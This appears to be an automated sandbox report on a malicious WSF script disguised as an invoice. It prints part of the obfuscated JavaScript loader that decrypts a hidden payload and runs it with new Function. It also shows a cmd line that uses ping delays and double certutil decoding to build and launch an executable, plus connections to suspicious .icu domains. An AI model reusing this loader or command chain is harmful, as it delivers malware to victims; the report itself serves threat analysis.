a=n.fZuooDWaQu(a),n=n.tAjRFOtDJa,e.xrkoWLGoQF({ukAoslEzPa:a,key:v,yLIlTYUEdC:n.yLIlTYUEdC,RfuCsvEMIVrithm:r,jspwHIXzmY:n.jspwHIXzmY,ovnGHahhRt:n.ovnGHahhRt,xWmTEJzxuk:r.xWmTEJzxuk,HCvDohrvxQ:t.XCoXBEMuLA})},IXjSHElPSb:function(r,a,v,t){return t=this.tAjRFOtDJa.LBLCJIeRxa(t),a=this._eMUXrzTNkg(a,t.XCoXBEMuLA),r.YTPIvGNUof(v,t).fZuooDWaQu(a.ukAoslEzPa)},_eMUXrzTNkg:function(r,a){return"string"==typeof r?a.eMUXrzTNkg(r,this):r}})),f=(f.kdf={}).pMgBTzEVtE={mxqauHfFCq:function(r,a,v,t){return t||(t=o.CqlccWGqHP(8)),r=n.xrkoWLGoQF({KzfiCbrnue:a+v}).IOaZMzuUuc(r,t),v=o.xrkoWLGoQF(r.eZRNeHSVmZ.slice(a),4*v),r.KlwuiHJXBf=4*a,e.xrkoWLGoQF({key:r,yLIlTYUEdC:v,salt:t})}},l=r.vaJXBqfphC=c.LBLCJIeRxa({tAjRFOtDJa:c.tAjRFOtDJa.LBLCJIeRxa({kdf:f}),PYbsXnmtJA:function(r,a,v,t){return v=(t=this.tAjRFOtDJa.LBLCJIeRxa(t)).kdf.mxqauHfFCq(v,r.KzfiCbrnue,r.XRkvWggaQX),t.yLIlTYUEdC=v.yLIlTYUEdC,(r=c.PYbsXnmtJA.call(this,r,a,v.key,t)).GYRmHplwNA(v),r},IXjSHElPSb:function(r,a,v,t){return t=this.tAjRFOtDJa.LBLCJIeRxa(t),a=this._eMUXrzTNkg(a,t.XCoXBEMuLA),v=t.kdf.mxqauHfFCq(v,r.KzfiCbrnue,r.XRkvWggaQX,a.gwiUkDQFxZ),t.yLIlTYUEdC=v.yLIlTYUEdC,c.IXjSHElPSb.call(this,r,a,v.key,t)}})}(),function(){for(var r=NKBCmUHGeG,a=r.eazSwMHLnL.BlockSQaxnzYskL,v=r.RfuCsvEMIV,o=[],t=[],n=[],i=[],s=[],u=[],h=[],e=[],c=[],f=[],l=[],p=0;p<256;p++)l[p]=p<128?p<<1:p<<1^283;var g=0,d=0;for(p=0;p<256;p++){var k=(k=d^d<<1^d<<2^d<<3^d<<4)>>>8^255&k^99;o[g]=k;var y=l[t[k]=g],w=l[y],S=l[w],_=257*l[k]^16843008*k;n[g]=_<<24|_>>>8,i[g]=_<<16|_>>>16,s[g]=_<<8|_>>>24,u[g]=_,_=16843009*S^65537*w^257*y^16843008*g,h[k]=_<<24|_>>>8,e[k]=_<<16|_>>>16,c[k]=_<<8|_>>>24,f[k]=_,g?(g=y^l[l[l[S^y]]],d^=l[l[d]]):g=d=1}var B=[0,1,2,4,8,16,32,64,128,27,54];v=v.vWLWtnhNPM=a.LBLCJIeRxa({VDrUSIMlYF:function(){for(var r=(v=this.ujgXpnylwb).eZRNeHSVmZ,a=v.KlwuiHJXBf/4,v=4*((this._nRounds=a+6)+1),t=this.ujgXpnylwbSchedule=[],n=0;n<v;n++)if(n<a)t[n]=r[n];else{var i=t[n-1];n%a?6<a&&4==n%a&&(i=o[i>>>24]<<24|o[i>>>16&255]<<16|o[i>>>8&255]<<8|o[255&i]):(i=o[(i=i<<8|i>>>24)>>>24]<<24|o[i>>>16&255]<<16|o[i>>>8&255]<<8|o[255&i],i^=B[n/a|0]<<24),t[n]=t[n-a]^i}for(r=this.hpsQNEkfti=[],a=0;a<v;a++)n=v-a,i=a%4?t[n]:t[n-4],r[a]=a<4||n<=4?i:h[o[i>>>24]]^e[o[i>>>16&255]]^c[o[i>>>8&255]]^f[o[255&i]]},PYbsXnmtJABlock:function(r,a){this.hXOUXbKyiS(r,a,this.ujgXpnylwbSchedule,n,i,s,u,o)},IXjSHElPSbBlock:function(r,a){var v=r[a+1];r[a+1]=r[a+3],r[a+3]=v,this.hXOUXbKyiS(r,a,this.hpsQNEkfti,h,e,c,f,t),v=r[a+1],r[a+1]=r[a+3],r[a+3]=v},hXOUXbKyiS:function(r,a,v,t,n,i,o,s){for(var u=this._nRounds,h=r[a]^v[0],e=r[a+1]^v[1],c=r[a+2]^v[2],f=r[a+3]^v[3],l=4,p=1;p<u;p++){var g=t[h>>>24]^n[e>>>16&255]^i[c>>>8&255]^o[255&f]^v[l++],d=t[e>>>24]^n[c>>>16&255]^i[f>>>8&255]^o[255&h]^v[l++],k=t[c>>>24]^n[f>>>16&255]^i[h>>>8&255]^o[255&e]^v[l++];f=t[f>>>24]^n[h>>>16&255]^i[e>>>8&255]^o[255&c]^v[l++],h=g,e=d,c=k}g=(s[h>>>24]<<24|s[e>>>16&255]<<16|s[c>>>8&255]<<8|s[255&f])^v[l++],d=(s[e>>>24]<<24|s[c>>>16&255]<<16|s[f>>>8&255]<<8|s[255&h])^v[l++],k=(s[c>>>24]<<24|s[f>>>16&255]<<16|s[h>>>8&255]<<8|s[255&e])^v[l++],f=(s[f>>>24]<<24|s[h>>>16&255]<<16|s[e>>>8&255]<<8|s[255&c])^v[l++],r[a]=g,r[a+1]=d,r[a+2]=k,r[a+3]=f},KzfiCbrnue:8});r.vWLWtnhNPM=a.bvTMfLRMFS(v)}(),new Function(NKBCmUHGeG.vWLWtnhNPM.IXjSHElPSb("","\x34\x34\x32\x61\x35\x62\x66\x30\x61\x64\x36\x30\x34\x66\x34\x38\x35\x66\x63\x61\x32\x36\x66\x38\x37\x33\x35\x63\x32\x33\x36\x64\x35\x34\x33\x63\x66\x65\x33\x65\x34\x64\x61\x35\x61\x34\x34\x66\x38\x34\x62\x35\x65\x39\x34\x39\x34\x31\x65\x64\x38\x38\x61\x36",{XCoXBEMuLA:dtEDoFVfAj}).toString(NKBCmUHGeG.VmLLEtCkRa.IBEHHawlRa))();
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
8
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start wscript.exe no specs cmd.exe no specs ping.exe no specs explorer.exe no specs cscript.exe no specs cscript.exe cmd.exe no specs ping.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
716"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Copy of Docs 68_204 INVO.WSF"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2632"C:\Windows\System32\cmd.exe" /c ping 1.1 -n 21 & cscript "C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.wsf" Function RegReadC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3996ping 1.1 -n 21 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2488"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2188cscript "C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.wsf" Function RegReadC:\Windows\system32\cscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3792"C:\Windows\System32\cscript.exe" "C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.drv?.wsf" Function RegReadC:\Windows\System32\cscript.exe
cscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Version:
5.8.7600.16385
2240"C:\Windows\System32\cmd.exe" /c ping 1.1.1.1 -n 120 & cd "C:\Users\admin\AppData\Roaming" && certutil -decode "evFzI6iZOm" "evFzI6iZOm2" && certutil -decode "evFzI6iZOm2" "evFzI6iZOm.exe" && explorer "evFzI6iZOm.exe"C:\Windows\System32\cmd.execscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2208ping 1.1.1.1 -n 120 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
381
Read events
336
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
3792cscript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\word[1].txt
MD5:
SHA256:
3792cscript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\0aaf0c56ae5396551dfa0589d5fda7abc37beea7e7d8d39b6901ffab66a493c09ecd4d69[1].txttext
MD5:2BB4834348AD8C7CA5DE33C569E175D4
SHA256:0AF1E9886832E35C63AD022EF7D89EF38313173A17AA0B66C2859BDD7F984F0C
2188cscript.exeC:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.drvxml
MD5:E8081971D97915187371190C7D5CEBD4
SHA256:1516E4E82B9A2F5EB0E506847F6E09069C65DD8DD13782F92C84BEF56CD91A5E
716WScript.exeC:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.wsfxml
MD5:E8081971D97915187371190C7D5CEBD4
SHA256:1516E4E82B9A2F5EB0E506847F6E09069C65DD8DD13782F92C84BEF56CD91A5E
3792cscript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@rapidssl[1].txttext
MD5:E5EECD8705F7E6228730DE0FD941769C
SHA256:FB70B30C85F3D9588F145623C701D60448CC7557D19E2BCBC761A87D0B250BC2
3792cscript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@cloudown[1].txttext
MD5:22AD25903920B63E49B74B9DB0E703F8
SHA256:CB3DB222BD0065F38897B77B2472838E592415AC88AFAF1F0A46353698DA7937
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3792
cscript.exe
104.28.28.55:443
certificate.rapidssl.icu
Cloudflare Inc
US
unknown
3792
cscript.exe
104.28.0.94:443
docs.cloudown.icu
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
docs.cloudown.icu
  • 104.28.0.94
  • 104.28.1.94
suspicious
certificate.rapidssl.icu
  • 104.28.28.55
  • 104.28.29.55
unknown

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .icu Domain
3792
cscript.exe
Potentially Bad Traffic
ET INFO Suspicious Domain (*.icu) in TLS SNI
No debug info